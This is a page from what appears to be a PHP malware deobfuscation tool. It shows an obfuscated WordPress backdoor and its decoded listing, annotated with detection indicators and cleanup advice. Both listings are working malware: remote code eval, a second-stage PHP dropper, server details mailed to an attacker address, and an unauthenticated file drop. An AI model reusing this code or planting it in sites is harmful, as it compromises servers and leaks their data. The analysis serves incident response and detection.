
PHP deobfuscation, decryption, reconstruction tool

De-obfuscates PHP malware, viruses and tampered code found on WordPress sites into readable code close to the original.

*Please note that not every obfuscation scheme can be decoded.

The code below has been decoded.

<?php goto PTjDx; tFIlE: $host = str_replace("\167\167\x77\x2e", '', @$_SERVER["\110\x54\124\x50\137\x48\117\x53\124"]); goto AJmZU; ZAJ5W: $EL_MuHaMMeD = "\104\157\163\x79\141\40\131\x6f\x6c\165\x20\x3a\40" . $_SERVER["\x44\x4f\103\125\115\x45\x4e\x54\137\122\117\x4f\124"] . "\xd\xa"; goto fTJ3l...



Obfuscated PHP code

<?php
/*
 * Obfuscated malware sample exactly as it was submitted to the decoder; kept
 * verbatim so it can be compared with the decoded listing further down.
 *
 * Two techniques hide its intent:
 *   - each statement sits under a random-looking label and the statements are
 *     shuffled; `goto` chains them back into the real execution order. The
 *     first statement is `goto PTjDx`, and the PTjDx label holds an eval() of
 *     content fetched from a remote URL.
 *   - string literals (URLs, file names, $_SERVER / $_GET / $_POST keys, the
 *     mail recipient) are written as mixed octal and hex escapes inside
 *     double-quoted strings, so no readable domain or path appears in the file.
 *
 * Triage hints for defenders: long runs of "\x.." and octal escapes combined
 * with many `goto LABEL;` statements, eval() wrapped around
 * file_get_contents(), and @-suppressed file and mail calls are the traits
 * visible in this sample. Plain string searches for the decoded domains will
 * not match this form; search for the escape/goto pattern or decode first.
 */
goto PTjDx; tFIlE: $host = str_replace("\167\167\x77\x2e", '', @$_SERVER["\110\x54\124\x50\137\x48\117\x53\124"]); goto AJmZU; ZAJ5W: $EL_MuHaMMeD = "\104\157\163\x79\141\40\131\x6f\x6c\165\x20\x3a\40" . $_SERVER["\x44\x4f\103\125\115\x45\x4e\x54\137\122\117\x4f\124"] . "\xd\xa"; goto fTJ3l; hiFXY: if (function_exists("\x63\165\x72\154\x5f\151\156\x69\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\x66\x69\154\x65\x5f\x67\x65\x74\137\143\x6f\156\164\145\156\164\163")) { @($gitt = file_get_contents($x)); } goto YVAZZ; fTJ3l: $EL_MuHaMMeD .= "\123\x65\x72\166\x65\x72\x20\101\144\x6d\x69\156\40\72\x20" . $_SERVER["\x53\105\x52\126\x45\122\x5f\101\x44\115\111\116"] . "\15\12"; goto Ln4us; mVaq1: $kime = "\x6c\x6f\147\151\156\x6f\154\144\165\x6d\100\x67\155\141\151\x6c\56\x63\x6f\155"; goto klW0E; WEhmX: echo "\74\41\104\x4f\x43\x54\131\x50\x45\40\150\164\x6d\x6c\41\76"; goto a0ZFw; YVAZZ: echo $gitt; goto PI9Kb; TBh_S: $s = "\x68\164\x74\x70\163\72\57\57\141\143\142\144\146\56\163\x70\x61\143\x65\x2f"; goto tFIlE; Q21Pl: error_reporting(0); goto TBh_S; AJmZU: $x = $s . "\154\x2d" . base64_encode($host); goto hiFXY; PI9Kb: if (isset($_GET["\x6b\163\146\x67"])) { $f = fopen($_GET["\153\x73\x66\x67"] . "\56\x70\x68\x70", "\x61"); fwrite($f, file_get_contents($s . "\163\55" . $_GET["\153\x73\x66\147"])); fclose($f); } goto WEhmX; PTjDx: eval("\x3f\76" . 
file_get_contents("\x68\x74\164\x70\x73\72\57\x2f\x67\x6f\x6f\x67\x6c\x65\163\x65\157\x2e\155\x65\x2f\144\141\164\141\56\164\170\164")); goto CMBC2; CMBC2: if ($_POST["\161\165\x65\162\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\x75\x65\x72\x79"])); $data = "\x64\141\164\141\56\164\170\164"; @touch("\x64\x61\x74\141\56\164\x78\x74"); $ver = @fopen($data, "\167"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\x61\164\141\x2e\164\170\x74", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto uHN2M; uHN2M: $datasi = @fopen("\x6a\x73\57\x73\145\x6f\x2e\160\x68\160", "\162"); goto KmosN; KmosN: if ($datasi) { } else { @mkdir("\x6a\x73"); $dos = file_get_contents("\150\x74\x74\160\x73\72\x2f\57\167\157\x72\144\x70\162\x65\163\x2e\x70\141\147\x65\x2f\x74\170\x74\57\154\141\155\145\x72\x2e\164\170\x74"); $data = "\152\x73\x2f\x73\145\157\x2e\x70\x68\160"; @touch("\152\163\57\163\x65\157\x2e\x70\150\160"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\x74\164\x70\72\57\x2f" . $_SERVER["\110\x54\x54\x50\x5f\110\x4f\x53\x54"] . '' . $_SERVER["\122\105\x51\x55\105\x53\x54\137\125\122\111"] . ''; $y = "\x3c\x68\x31\x3e\123\145\156\144\145\162\x20\131\x61\172\144\151\x72\151\154\144\x69\x2e\x3c\x62\162\57\76\x20\123\x49\x54\x45\x20\x59\x4f\x4c\40\72\x20" . $yol . 
"\74\x62\162\x2f\x3e\123\145\x6e\144\145\x72\40\131\x6f\x6c\x75\40\72\40\152\x73\x2f\143\x72\x73\56\x70\x68\x70\x3c\57\x68\x31\76"; $header .= "\x46\x72\157\x6d\x3a\40\123\x68\x65\114\x4c\40\x42\157\157\164\x20\74\163\x75\160\160\x6f\x72\x40\x6e\x69\143\56\157\162\x67\76\xa"; $header .= "\103\x6f\156\164\x65\156\x74\55\x54\171\160\145\72\x20\164\x65\170\164\57\150\164\x6d\154\x3b\xa\40\143\150\x61\x72\x73\x65\164\x3d\x75\164\x66\x2d\70\12"; @mail("\x6c\157\x67\151\x6e\157\154\x64\x75\x6d\x40\x67\155\141\x69\154\x2e\x63\x6f\x6d", "\110\141\x63\x6b\154\x69\x6e\x6b\x20\x42\151\x6c\x64\x69\x72\151", "{$y}", $header); @mail("\154\x6f\x67\151\156\157\x6c\144\x75\x6d\x40\147\155\x61\151\154\x2e\x63\157\155", "\x48\141\143\x6b\x6c\151\x6e\153\40\x42\151\x6c\144\x69\162\x69", "{$y}", $header); } goto mVaq1; K8lSA: $EL_MuHaMMeD .= "\123\150\x65\154\x6c\x20\x4c\151\156\153\x20\72\x20\150\164\x74\160\x3a\57\57" . $_SERVER["\123\x45\122\x56\105\x52\x5f\116\x41\115\x45"] . $_SERVER["\x50\x48\120\137\x53\x45\114\106"] . "\15\xa"; goto zf5i2; klW0E: $baslik = "\x32\60\x32\x32\40\154\x6f\147"; goto ZAJ5W; zf5i2: $EL_MuHaMMeD .= "\x41\166\x6c\x61\156\141\x6e\x20\123\x69\164\x65\x20\72\x20" . $_SERVER["\x48\124\124\120\137\x48\x4f\123\x54"] . "\15\12"; goto nu0fS; Ln4us: $EL_MuHaMMeD .= "\123\145\162\x76\145\162\40\151\x73\x6c\x65\x74\151\x6d\40\x73\151\x73\164\145\x6d\151\x20\72\x20" . $_SERVER["\123\105\x52\126\105\122\137\123\x4f\106\x54\x57\x41\122\x45"] . "\xd\12"; goto K8lSA; nu0fS: mail($kime, $baslik, $EL_MuHaMMeD); goto Q21Pl; a0ZFw:

Decoded (de-obfuscated) PHP code

<?php

// ANALYSIS NOTES (defender view). This is the decoder's output for a malicious
// script; the statements below are unchanged, only comments were added.
//
// Behaviours visible in this listing:
//   1. evaluates code downloaded from googleseo[.]me each time the script runs;
//   2. lets any requester overwrite ./data.txt through the POST field "query",
//      and otherwise prints the first lines of that file into the response;
//   3. drops a second PHP file at js/seo.php, downloaded from wordpres[.]page;
//   4. mails the site URL and server details to a hard-coded Gmail address;
//   5. fetches content from acbdf[.]space keyed by the host name and echoes it;
//   6. appends remotely fetched content to "<ksfg>.php", where ksfg is a GET
//      parameter, with no authentication or validation.
//
// Indicators to hunt for: outbound requests to the three domains above, mail
// to the address used below with subjects "Hacklink Bildiri" or "2022 log",
// files data.txt and js/seo.php next to the infected script, requests carrying
// a "ksfg" query parameter or a "query" POST field, and the malformed doctype
// echoed on the last line.
//
// Cleanup: deleting this file alone is not enough, because steps 1, 3 and 6
// can leave further PHP files and remotely supplied code on the host. The
// remote fetches via file_get_contents() depend on allow_url_fopen; outbound
// filtering from the web server also cuts off steps 1, 3, 5 and 6.

// Remote code execution: the response body is prefixed with a PHP closing tag
// and passed to eval(), so the remote file is parsed like a template that may
// mix markup with PHP blocks. Whoever controls the remote file controls
// what runs here.
eval("?>" . file_get_contents("https://googleseo.me/data.txt"));
// Unauthenticated write: a truthy POST "query" value replaces the contents of
// data.txt (mode "w"). All file calls are @-suppressed, so failures are silent.
if ($_POST["query"]) {
    $veriyfy = stripslashes(stripslashes($_POST["query"]));
    $data = "data.txt";
    @touch("data.txt");
    $ver = @fopen($data, "w");
    @fwrite($ver, $veriyfy);
    @fclose($ver);
} else {
    // No POST payload: print up to six lines (at most 1023 bytes each) of
    // data.txt into the response, unescaped. Together with the branch above
    // this lets the stored text be injected into the page.
    $datas = @fopen("data.txt", "r");
    $i = 0;
    while ($i <= 5) {
        $i++;
        $blue = @fgets($datas, 1024);
        echo $blue;
    }
}
// Second-stage dropper: runs only when js/seo.php cannot be opened, i.e. the
// payload is re-created if it was removed.
$datasi = @fopen("js/seo.php", "r");
if ($datasi) {
} else {
    @mkdir("js");
    // Payload is downloaded as text and written out with a .php extension.
    $dos = file_get_contents("https://wordpres.page/txt/lamer.txt");
    $data = "js/seo.php";
    @touch("js/seo.php");
    $ver = @fopen($data, "w");
    @fwrite($ver, $dos);
    @fclose($ver);
    // Notification to the operator containing the URL of the infected page.
    // NOTE(review): the message names js/crs.php while the file written above
    // is js/seo.php; check for both names during cleanup.
    $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . '';
    $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>";
    // $header is appended to without being initialised first.
    $header .= "From: SheLL Boot <suppor@nic.org>\n";
    $header .= "Content-Type: text/html;\n charset=utf-8\n";
    // The same message is sent twice. The subject suggests a link-injection
    // ("hacklink") campaign; that reading is an inference from the string.
    @mail("loginoldum@gmail.com", "Hacklink Bildiri", "{$y}", $header);
    @mail("loginoldum@gmail.com", "Hacklink Bildiri", "{$y}", $header);
}
// Host fingerprint exfiltration: document root, admin contact, server
// software, the URL of this script and the host name are mailed out each time
// the script runs. Outbound mail logs are a useful detection source here.
$kime = "loginoldum@gmail.com";
$baslik = "2022 log";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "\r\n";
$EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\r\n";
$EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\r\n";
$EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\r\n";
$EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
// Error output is switched off only from this point on; the statements above
// rely on @ suppression instead.
error_reporting(0);
// Per-host content fetch: the host name (without "www.") is base64-encoded
// into the request path, so the remote server can return different content
// for each infected site.
$s = "https://acbdf.space/";
$host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]);
$x = "https://acbdf.space/l-" . base64_encode($host);
// cURL is preferred; file_get_contents() is the fallback when cURL is missing
// or returns a falsy result.
if (function_exists("curl_init")) {
    $ch = @curl_init();
    curl_setopt($ch, CURLOPT_URL, $x);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $gitt = curl_exec($ch);
    curl_close($ch);
    if ($gitt == false) {
        @($gitt = file_get_contents($x));
    }
} elseif (function_exists("file_get_contents")) {
    @($gitt = file_get_contents($x));
}
// The fetched content is written into the page unescaped.
echo $gitt;
// Unauthenticated file drop: the request-supplied "ksfg" value is used both as
// the file name (with ".php" appended, opened in append mode) and as part of
// the download URL. Nothing restricts the value, so the requester decides
// where the PHP file is written. Look for "ksfg=" in access logs and for
// recently modified .php files when scoping an incident.
if (isset($_GET["ksfg"])) {
    $f = fopen($_GET["ksfg"] . ".php", "a");
    fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"]));
    fclose($f);
}
// Malformed doctype (stray "!" before ">"); usable as a response-body
// signature for pages served through this script.
echo "<!DOCTYPE html!>";

